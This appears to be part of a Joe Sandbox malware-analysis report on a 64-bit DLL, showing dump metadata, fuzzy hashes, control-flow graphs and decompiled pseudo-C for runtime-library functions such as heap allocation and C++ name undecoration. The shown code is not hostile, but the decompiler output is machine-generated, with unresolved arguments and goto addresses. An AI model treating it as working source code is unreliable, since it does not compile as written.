                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: BoundaryDeleteDescriptorErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2050971199-0
                                                                      • Opcode ID: 7feab53bc8141cfddc754512938789f701b57d87cc7f42e144850f1edffadfc4
                                                                      • Instruction ID: b908c6930c5ab40a117e896001ffe84853dd0da69792a0aea7953c5c77e21790
                                                                      • Opcode Fuzzy Hash: 7feab53bc8141cfddc754512938789f701b57d87cc7f42e144850f1edffadfc4
                                                                      • Instruction Fuzzy Hash: C8E01271B0194C72FFEB67F258553F512915F5C7C1F04C422790592252EE29868D4344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 588 180042404-180042413 589 180042415-180042421 588->589 590 180042423-180042433 588->590 589->590 591 180042466-180042471 call 180013b18 589->591 592 18004244a-180042462 RtlAllocateHeap 590->592 598 180042473-180042478 591->598 593 180042435-18004243c call 18004cc48 592->593 594 180042464 592->594 593->591 600 18004243e-180042448 call 180039c28 593->600 594->598 600->591 600->592
                                                                      C-Code - Quality: 37%
                                                                      			E00000001180042404(void* __eax, signed int __rcx, signed int __rdx, void* __r10) {
                                                                      				intOrPtr* _t22;
                                                                      				signed int _t29;
                                                                      
                                                                      				_t29 = __rdx;
                                                                      				if (__rcx == 0) goto 0x80042423;
                                                                      				_t1 = _t29 - 0x20; // -32
                                                                      				_t22 = _t1;
                                                                      				if (_t22 - __rdx < 0) goto 0x80042466;
                                                                      				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                      				goto 0x8004244a;
                                                                      				if (E0000000118004CC48() == 0) goto 0x80042466;
                                                                      				if (E00000001180039C28(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80042466;
                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                      				if (_t22 == 0) goto 0x80042435;
                                                                      				goto 0x80042473;
                                                                      				E00000001180013B18(_t22);
                                                                      				 *_t22 = 0xc;
                                                                      				return 0;
                                                                      			}





                                                                      0x180042404
                                                                      0x180042413
                                                                      0x180042417
                                                                      0x180042417
                                                                      0x180042421
                                                                      0x18004242f
                                                                      0x180042433
                                                                      0x18004243c
                                                                      0x180042448
                                                                      0x180042459
                                                                      0x180042462
                                                                      0x180042464
                                                                      0x180042466
                                                                      0x18004246b
                                                                      0x180042478

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,000000018003D1CA,?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 0000000180042459
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 6df60b198beaba21e08df33ef050db9306f7c3fc6f072e8e29b5c7a32367a3fe
                                                                      • Instruction ID: ce10647a070d8ed039022375b8ebf862bdb2fb0c06172afa246f769aa7cb0dba
                                                                      • Opcode Fuzzy Hash: 6df60b198beaba21e08df33ef050db9306f7c3fc6f072e8e29b5c7a32367a3fe
                                                                      • Instruction Fuzzy Hash: 42F09070301A0D41FEDB576299913E54290ABCDBC4F8DD4317D0A863C1EE1CC78D4329
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0000000118003F930(intOrPtr* __rax, void* __rcx, void* __r10) {
                                                                      
                                                                      				if (__rcx - 0xffffffe0 > 0) goto 0x8003f97b;
                                                                      				_t16 =  ==  ? __rax : __rcx;
                                                                      				goto 0x8003f962;
                                                                      				if (E0000000118004CC48() == 0) goto 0x8003f97b;
                                                                      				if (E00000001180039C28(__rax,  ==  ? __rax : __rcx) == 0) goto 0x8003f97b;
                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                      				if (__rax == 0) goto 0x8003f94d;
                                                                      				goto 0x8003f988;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 0xc;
                                                                      				return 0;
                                                                      			}



                                                                      0x18003f93d
                                                                      0x18003f947
                                                                      0x18003f94b
                                                                      0x18003f954
                                                                      0x18003f960
                                                                      0x18003f96e
                                                                      0x18003f977
                                                                      0x18003f979
                                                                      0x18003f97b
                                                                      0x18003f980
                                                                      0x18003f98d

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180048914,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000000018003F96E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: e5a31d79c21f22ade887a10b4e2ed2eadefb17b048c8447aee16b90742452c20
                                                                      • Instruction ID: 12ab2d00a1801d220eabafaae87e64719d8e54111dfcfbb84cdd53af54dab7a2
                                                                      • Opcode Fuzzy Hash: e5a31d79c21f22ade887a10b4e2ed2eadefb17b048c8447aee16b90742452c20
                                                                      • Instruction Fuzzy Hash: ABF0F83031160D51FEE76BA259913F623805B8D7E0F0AC626792A863C5DE29868D8320
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00000001180003628(void* __ecx) {
                                                                      				void* __rbx;
                                                                      				void* _t12;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      
                                                                      				_t2 =  ==  ? 1 :  *0x80071298 & 0x000000ff;
                                                                      				 *0x80071298 =  ==  ? 1 :  *0x80071298 & 0x000000ff;
                                                                      				E00000001180003D28(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                      				if (E00000001180004EA8() != 0) goto 0x80003657;
                                                                      				goto 0x8000366b; // executed
                                                                      				E0000000118003C308(_t17); // executed
                                                                      				if (0 != 0) goto 0x80003669;
                                                                      				E00000001180004EF8(0);
                                                                      				goto 0x80003653;
                                                                      				return 1;
                                                                      			}










                                                                      0x18000363c
                                                                      0x18000363f
                                                                      0x180003645
                                                                      0x180003651
                                                                      0x180003655
                                                                      0x180003657
                                                                      0x18000365e
                                                                      0x180003662
                                                                      0x180003667
                                                                      0x180003670

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: __scrt_dllmain_crt_thread_attach
                                                                      • String ID:
                                                                      • API String ID: 2860701742-0
                                                                      • Opcode ID: 6872538b16b6f02c47732e22586e56045e342ae397f28685f7f2bb8f15c04e73
                                                                      • Instruction ID: 8ff6159b75b66d1356b59725ac8bf0d5e6832807f47fa4298edda68841e5800a
                                                                      • Opcode Fuzzy Hash: 6872538b16b6f02c47732e22586e56045e342ae397f28685f7f2bb8f15c04e73
                                                                      • Instruction Fuzzy Hash: ACE04FB260428C64FED7A67A20437FA37841B1D3C1F14C069785A872D3CE0B57AE2726
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E00000001180002810(void* __rax, void* __rcx) {
                                                                      				void* _t1;
                                                                      
                                                                      				goto 0x8000282a;
                                                                      				_t1 = E00000001180039C28(__rax, __rcx);
                                                                      				if (_t1 == 0) goto 0x8000283a;
                                                                      				0x80039cf4(); // executed
                                                                      				if (__rax == 0) goto 0x8000281b;
                                                                      				return _t1;
                                                                      			}




                                                                      0x180002819
                                                                      0x18000281e
                                                                      0x180002825
                                                                      0x18000282a
                                                                      0x180002832
                                                                      0x180002839

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                      • String ID:
                                                                      • API String ID: 680105476-0
                                                                      • Opcode ID: 8f2222f882755470ffb2c5da2b273b19dfc1ca7ac93733a7997ed64d3d7e7643
                                                                      • Instruction ID: c77b5e6d42d44c515596b01454ff7c37b1356d2e002381d1f7d9abbd5336824c
                                                                      • Opcode Fuzzy Hash: 8f2222f882755470ffb2c5da2b273b19dfc1ca7ac93733a7997ed64d3d7e7643
                                                                      • Instruction Fuzzy Hash: EBE0E225A5310E41FDEBF2A254563E621840B4D7F0E18EB207D76042C3AD14869F8310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E000000011800063E0(signed int __rbx, signed int* __rcx, intOrPtr* __rdx) {
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __r12;
                                                                      				void* __r14;
                                                                      				intOrPtr _t426;
                                                                      				signed int _t464;
                                                                      				signed int _t471;
                                                                      				signed long long _t503;
                                                                      				intOrPtr _t511;
                                                                      				unsigned int _t521;
                                                                      				unsigned int _t530;
                                                                      				unsigned int _t539;
                                                                      				signed int _t556;
                                                                      				unsigned int _t576;
                                                                      				unsigned int _t588;
                                                                      				signed int _t601;
                                                                      				signed int _t610;
                                                                      				signed int _t623;
                                                                      				signed int _t624;
                                                                      				signed int _t626;
                                                                      				unsigned int _t633;
                                                                      				signed int _t639;
                                                                      				unsigned int _t641;
                                                                      				signed int _t656;
                                                                      				signed int _t693;
                                                                      				signed int _t695;
                                                                      				signed int _t698;
                                                                      				signed int _t699;
                                                                      				void* _t704;
                                                                      				void* _t709;
                                                                      				void* _t777;
                                                                      				void* _t781;
                                                                      				void* _t785;
                                                                      				void* _t788;
                                                                      				void* _t789;
                                                                      				signed int _t792;
                                                                      				signed int _t793;
                                                                      				signed int _t797;
                                                                      				signed long long _t800;
                                                                      				signed long long _t802;
                                                                      				signed long long _t807;
                                                                      				signed long long _t808;
                                                                      				signed long long* _t809;
                                                                      				signed long long* _t812;
                                                                      				signed long long* _t815;
                                                                      				signed long long _t819;
                                                                      				signed long long _t836;
                                                                      				signed long long _t837;
                                                                      				signed long long* _t838;
                                                                      				signed long long* _t839;
                                                                      				void* _t842;
                                                                      				signed long long _t860;
                                                                      				signed long long _t864;
                                                                      				signed long long* _t865;
                                                                      				signed long long _t869;
                                                                      				void* _t909;
                                                                      				void* _t994;
                                                                      				void* _t996;
                                                                      				long long* _t997;
                                                                      				void* _t999;
                                                                      				void* _t1000;
                                                                      				void* _t1002;
                                                                      				void* _t1003;
                                                                      				void* _t1031;
                                                                      				void* _t1032;
                                                                      				void* _t1033;
                                                                      				void* _t1035;
                                                                      				void* _t1037;
                                                                      				void* _t1039;
                                                                      				intOrPtr* _t1040;
                                                                      				signed long long _t1043;
                                                                      
                                                                      				 *((long long*)(_t1002 + 8)) = __rbx;
                                                                      				_t1000 = _t1002 - 0x20;
                                                                      				_t1003 = _t1002 - 0x120;
                                                                      				_t426 =  *0x80071308; // 0x0
                                                                      				_t1040 = __rdx;
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x40) & 0x00000000;
                                                                      				_t997 = __rcx;
                                                                      				 *((intOrPtr*)(_t1000 - 0x68)) = _t426 -  *0x80071310;
                                                                      				 *(_t1003 + 0x48) = 0;
                                                                      				_t699 = E0000000118000CBFC(__rcx, _t1031, _t1032);
                                                                      				if ( *__rdx == 0) goto 0x8000643f;
                                                                      				if (( *(__rdx + 8) & 0x00000200) == 0) goto 0x8000643f;
                                                                      				 *(_t1000 + 0x78) = 1;
                                                                      				goto 0x80006442;
                                                                      				 *(_t1000 + 0x78) =  *(_t1000 + 0x78) & 0;
                                                                      				if (_t699 != 0xffff) goto 0x80006459;
                                                                      				__rcx[2] = __rcx[2] & 0;
                                                                      				 *__rcx =  *__rcx & __rbx;
                                                                      				__rcx[2] = 2;
                                                                      				goto 0x80007267;
                                                                      				if (_t699 != 0xfffe) goto 0x80006486;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0;
                                                                      				_t1005 = __rdx;
                                                                      				 *(_t1003 + 0x50) = 0x8005f780;
                                                                      				_t842 = _t1003 + 0x50;
                                                                      				E00000001180005F48(_t842, __rcx, __rdx);
                                                                      				goto 0x80007267;
                                                                      				_t704 = _t699 - 0xfffd;
                                                                      				if (_t704 != 0) goto 0x8000649a;
                                                                      				 *_t997 = 0x8005f780;
                                                                      				goto 0x80007264;
                                                                      				r14d = _t699;
                                                                      				r13d = 0x6000;
                                                                      				r14d = r14d & 0x00008000;
                                                                      				if (_t704 == 0) goto 0x80006d31;
                                                                      				r12d = _t699;
                                                                      				r12d = r12d & 0x00001800;
                                                                      				r13d = 0x1000;
                                                                      				 *(_t1000 + 0x70) = 0 | r12d == 0x00000800;
                                                                      				 *(_t1000 + 0x68) = 0 | (r13d & _t699) == 0x00000000;
                                                                      				r13d =  ==  ? 0x400 : r13d;
                                                                      				r13d = r13d & _t699;
                                                                      				 *(_t1000 - 0x6c) = r13d;
                                                                      				if (r12d == 0x800) goto 0x80006514;
                                                                      				_t30 = _t842 - 0x1000; // -4096
                                                                      				if ((_t30 & 0xfffffcff) != 0) goto 0x80006514;
                                                                      				_t709 = (_t699 & 0x00001b00) - 0x1300;
                                                                      				if (_t709 != 0) goto 0x80006d2b;
                                                                      				asm("bt edi, 0xe");
                                                                      				if (_t709 >= 0) goto 0x8000658b;
                                                                      				_t633 =  *0x80071318; // 0x0
                                                                      				if (( !((_t633 >> 0x00000002 |  *0x80071318) >> 1) & 0x00000001) == 0) goto 0x80006578;
                                                                      				E00000001180007AF8( !((_t633 >> 0x00000002 |  *0x80071318) >> 1), _t699,  !((_t633 >> 0x00000002 |  *0x80071318) >> 1) & 0x00000001, 0x8005f780, __rbx, _t1003 + 0x30, _t997, _t1005, _t1039);
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				E00000001180007320(0x20, 0x8005f780, 0x8005f780, _t1003 + 0x70);
                                                                      				E00000001180005F48(_t1003 + 0x70, _t1003 + 0x50, 0x8005f780);
                                                                      				_t800 =  *(_t1003 + 0x50);
                                                                      				 *(_t1003 + 0x40) = _t800;
                                                                      				goto 0x80006587;
                                                                      				E00000001180007AF8( !((_t633 >> 0x00000002 |  *0x80071318) >> 1), _t699,  !((_t633 >> 0x00000002 |  *0x80071318) >> 1) & 0x00000001, _t800, 0x8005f780, _t1003 + 0x70, _t997, 0x8005f780, _t1037);
                                                                      				if ( *(_t800 + 8) - 1 <= 0) goto 0x8000658b;
                                                                      				 *(_t1003 + 0x48) =  *(_t800 + 8) & 0x000000ff;
                                                                      				if (r13d == 0) goto 0x80006717;
                                                                      				if (r12d != 0x1800) goto 0x80006717;
                                                                      				r8b = 0x7b;
                                                                      				E00000001180005F74(_t1040, _t1003 + 0x50);
                                                                      				_t836 = _t800;
                                                                      				E000000011800090E8(0, _t836, _t1003 + 0x30, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				E00000001180005F48(_t836, _t1003 + 0x70, _t1003 + 0x30);
                                                                      				E00000001180006090(0, _t1003 + 0x40, _t800, _t1003 + 0x30);
                                                                      				E0000000118000D1B8(_t1003 + 0x30);
                                                                      				if (( *0x80071318 & 0x00001000) != 0) goto 0x80006663;
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				 *(_t1003 + 0x50) = "}\' ";
                                                                      				r13d = 3;
                                                                      				 *(_t1003 + 0x58) = r13d;
                                                                      				asm("movaps xmm0, [esp+0x50]");
                                                                      				asm("movdqa [esp+0x50], xmm0");
                                                                      				E00000001180007320(0x2c, "}\' ", _t836, _t1003 + 0x70);
                                                                      				_t65 = _t1000 - 0x50; // -77
                                                                      				E00000001180005F48(_t1003 + 0x70, _t65, _t1003 + 0x30);
                                                                      				_t68 = _t1000 - 0x40; // -61
                                                                      				_t69 = _t1000 - 0x50; // -77
                                                                      				E00000001180005F1C(_t69, _t68, _t1003 + 0x50);
                                                                      				E00000001180006090(0, _t1003 + 0x40, "}\' ", _t1003 + 0x50);
                                                                      				_t802 = "}\'";
                                                                      				 *(_t1003 + 0x58) = 2;
                                                                      				 *(_t1003 + 0x50) = _t802;
                                                                      				asm("movaps xmm0, [esp+0x50]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E00000001180006010(0x2c, _t699, _t802, _t836, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                                      				E000000011800082DC(_t836, _t1003 + 0x30, _t994, _t997, _t1035, _t1033);
                                                                      				_t639 =  *0x80071318; // 0x0
                                                                      				if (( !(_t639 >> 1) & 0x00000001) == 0) goto 0x8000670f;
                                                                      				if (( !(_t639 >> 4) & 0x00000001) == 0) goto 0x8000670f;
                                                                      				if ((0x00001000 & _t639) != 0) goto 0x8000670f;
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x70) & 0x00000000;
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x78) & 0x00000000;
                                                                      				E00000001180007320(0x20, _t802, _t836, _t1003 + 0x70);
                                                                      				E00000001180005F48(_t1003 + 0x70, _t1003 + 0x50, _t1003 + 0x30);
                                                                      				r8b = 0x20;
                                                                      				_t90 = _t1000 - 0x50; // -77
                                                                      				E00000001180005F74(_t1003 + 0x50, _t90);
                                                                      				_t860 = _t802;
                                                                      				_t93 = _t1000 - 0x40; // -61
                                                                      				E00000001180005F48(_t860, _t93, _t1003 + 0x40);
                                                                      				goto 0x80006f91;
                                                                      				goto 0x80006fa0;
                                                                      				 *(_t1000 - 0x40) = _t860;
                                                                      				 *(_t1000 - 0x38) = _t639;
                                                                      				 *(_t1000 - 0x50) = _t860;
                                                                      				 *(_t1000 - 0x48) = _t639;
                                                                      				 *(_t1000 - 0x60) = _t860;
                                                                      				 *(_t1000 - 0x58) = _t639;
                                                                      				 *(_t1003 + 0x70) = _t860;
                                                                      				 *(_t1003 + 0x78) = _t639;
                                                                      				 *(_t1000 - 0x30) = _t860;
                                                                      				 *(_t1000 - 0x28) = _t639;
                                                                      				if (r13d == 0) goto 0x800067d9;
                                                                      				if (r12d != 0x800) goto 0x800067b9;
                                                                      				if ((_t699 & 0x00000700) != 0x600) goto 0x80006796;
                                                                      				E000000011800090E8(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				 *(_t1000 - 0x40) =  *(_t1003 + 0x50);
                                                                      				 *(_t1000 - 0x38) =  *(_t1003 + 0x58);
                                                                      				E000000011800090E8(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				 *(_t1000 - 0x50) =  *(_t1003 + 0x50);
                                                                      				_t464 =  *(_t1003 + 0x58);
                                                                      				 *(_t1000 - 0x48) = _t464;
                                                                      				goto 0x8000679d;
                                                                      				if (_t464 != 0x500) goto 0x800067b9;
                                                                      				E000000011800090E8(1, _t836, _t1003 + 0x50, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				 *(_t1000 - 0x60) =  *(_t1003 + 0x50);
                                                                      				 *(_t1000 - 0x58) =  *(_t1003 + 0x58);
                                                                      				_t864 = _t1003 + 0x50;
                                                                      				E000000011800090E8(1, _t836, _t864, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				 *(_t1003 + 0x70) =  *(_t1003 + 0x50);
                                                                      				 *(_t1003 + 0x78) =  *(_t1003 + 0x58);
                                                                      				if (r12d != 0x800) goto 0x80006867;
                                                                      				if ((_t699 & 0x00000700) == 0x200) goto 0x80006867;
                                                                      				_t471 =  *0x80071318; // 0x0
                                                                      				r8d = 0;
                                                                      				 *(_t1003 + 0x50) = _t864;
                                                                      				 *(_t1003 + 0x58) = 0;
                                                                      				 *(_t1003 + 0x20) = 1;
                                                                      				if ((_t471 & 0x00000060) == 0x60) goto 0x8000683e;
                                                                      				 *(_t1000 - 0x80) = _t864;
                                                                      				 *(_t1000 - 0x78) = 0;
                                                                      				_t132 = _t1000 - 0x80; // 0xf80
                                                                      				_t865 = _t1003 + 0x30;
                                                                      				E0000000118000841C(_t699, _t836, _t865, _t132, _t994, _t997, _t1003 + 0x50);
                                                                      				_t807 =  *(_t1003 + 0x30);
                                                                      				 *(_t1000 - 0x30) = _t807;
                                                                      				goto 0x80006864;
                                                                      				 *(_t1003 + 0x30) = _t865;
                                                                      				 *(_t1003 + 0x38) = 0;
                                                                      				_t141 = _t1000 - 0x80; // 0xf80
                                                                      				E0000000118000841C(_t699, _t836, _t141, _t1003 + 0x50, _t994, _t997, _t1003 + 0x30);
                                                                      				if ( *(_t1000 - 0x78) - 1 <= 0) goto 0x80006867;
                                                                      				 *(_t1000 - 0x28) =  *(_t1000 - 0x78) & 0x000000ff;
                                                                      				_t641 =  *0x80071318; // 0x0
                                                                      				r13d = 3;
                                                                      				if (( !(_t641 >> 1) & 0x00000001) == 0) goto 0x80006932;
                                                                      				_t643 =  !(_t641 >> 4);
                                                                      				if (( !(_t641 >> 4) & 0x00000001) == 0) goto 0x80006909;
                                                                      				E000000011800082DC(_t836, _t1003 + 0x30, _t994, _t997, _t994, _t996);
                                                                      				E00000001180005F48(_t807, _t1003 + 0x50, _t1003 + 0x40);
                                                                      				_t869 =  *_t807;
                                                                      				 *(_t1003 + 0x40) = _t869;
                                                                      				 *(_t1003 + 0x48) =  *(_t807 + 8);
                                                                      				_t808 =  *_t1040;
                                                                      				if (_t808 == 0) goto 0x80006946;
                                                                      				if (_t869 == 0) goto 0x80006939;
                                                                      				if (( *0x80071318 & 0x00001000) != 0) goto 0x80006939;
                                                                      				 *(_t1000 - 0x80) = _t836;
                                                                      				_t158 = _t1000 - 0x80; // -125
                                                                      				 *(_t1000 - 0x78) = 0;
                                                                      				E00000001180007320(0x20, _t808, _t836, _t158);
                                                                      				_t161 = _t1000 - 0x80; // -125
                                                                      				E00000001180005F48(_t161, _t1003 + 0x30, _t1040);
                                                                      				E00000001180006090( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t1040);
                                                                      				goto 0x80006946;
                                                                      				E000000011800082DC(_t836, _t1003 + 0x40, _t994, _t997);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x800068b6;
                                                                      				if ( *(_t808 + 8) - 1 <= 0) goto 0x800068b6;
                                                                      				 *(_t1003 + 0x48) = 0;
                                                                      				goto 0x800068b6;
                                                                      				goto 0x80006909;
                                                                      				 *(_t1003 + 0x40) = _t808;
                                                                      				 *(_t1003 + 0x48) =  *(_t1040 + 8);
                                                                      				 *(_t1000 - 0x80) = _t836;
                                                                      				 *(_t1000 - 0x70) = 0;
                                                                      				if ( *(_t1000 + 0x78) == (0 |  *(_t808 + 8) & 0x000000ff)) goto 0x80006a64;
                                                                      				_t176 = _t1000 - 0x10; // -13
                                                                      				E0000000118000B584(_t699, _t176, _t994);
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & _t836;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & r15d;
                                                                      				_t837 = _t808;
                                                                      				E00000001180007320(0x20, _t808, _t837, _t1003 + 0x50);
                                                                      				E00000001180005F48(_t1003 + 0x50, _t1003 + 0x30, _t837);
                                                                      				E00000001180006090( !(_t641 >> 4), _t1003 + 0x40, _t1003 + 0x30, _t837);
                                                                      				if (( *0x80071318 & 0x00001000) != 0) goto 0x80007258;
                                                                      				if ( *(_t1000 - 0x6c) == 0) goto 0x80006b77;
                                                                      				if (r12d != 0x800) goto 0x80006b0c;
                                                                      				if ((_t699 & 0x00000700) != 0x600) goto 0x80006aa6;
                                                                      				 *(_t1003 + 0x38) = 0xc;
                                                                      				_t809 = "`vtordispex{";
                                                                      				 *(_t1003 + 0x30) = _t809;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				_t192 = _t1000 - 0x10; // -13
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC(_t809, _t192, _t1003 + 0x30);
                                                                      				_t193 = _t1000 - 0x40; // -61
                                                                      				E00000001180005F48(_t809, _t1003 + 0x30, _t193);
                                                                      				r8b = 0x2c;
                                                                      				E00000001180005F74(_t1003 + 0x30, _t1003 + 0x50);
                                                                      				_t197 = _t1000 - 0x50; // -77
                                                                      				E00000001180005F48(_t809, _t1000, _t197);
                                                                      				r8b = 0x2c;
                                                                      				_t198 = _t1000 + 0x10; // 0x13
                                                                      				E00000001180005F74(_t809, _t198);
                                                                      				_t199 = _t1000 - 0x60; // -93
                                                                      				_t200 = _t1000 - 0x20; // -29
                                                                      				E00000001180005F48(_t809, _t200, _t199);
                                                                      				goto 0x80006af5;
                                                                      				E0000000118000A0A4(_t809, _t837, 0x80071330, _t1003 + 0x60, _t997, _t999);
                                                                      				if (_t809 == 0) goto 0x80006a85;
                                                                      				 *_t809 = _t837;
                                                                      				_t809[1] = 0;
                                                                      				goto 0x80006a88;
                                                                      				_t1043 = _t837;
                                                                      				_t203 = _t1000 - 0x10; // -13
                                                                      				E0000000118000B584(_t699, _t203, _t994);
                                                                      				_t503 = _t809[1];
                                                                      				 *(_t1000 - 0x80) =  *_t809;
                                                                      				 *(_t1000 - 0x70) = _t503;
                                                                      				goto 0x800069b0;
                                                                      				if (_t503 != 0x500) goto 0x80006b0c;
                                                                      				 *(_t1003 + 0x38) = 0xa;
                                                                      				 *(_t1003 + 0x30) = "`vtordisp{";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("`vtordisp{", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				_t211 = _t1000 - 0x60; // -93
                                                                      				E00000001180005F48("`vtordisp{", _t1003 + 0x30, _t211);
                                                                      				_t213 = _t1000 - 0x20; // -29
                                                                      				r8b = 0x2c;
                                                                      				E00000001180005F74(_t1003 + 0x30, _t213);
                                                                      				E00000001180006090( !(_t641 >> 4), _t1003 + 0x40, "`vtordisp{", _t211);
                                                                      				goto 0x80006b3a;
                                                                      				 *(_t1003 + 0x38) = 0xa;
                                                                      				 *(_t1003 + 0x30) = "`adjustor{";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
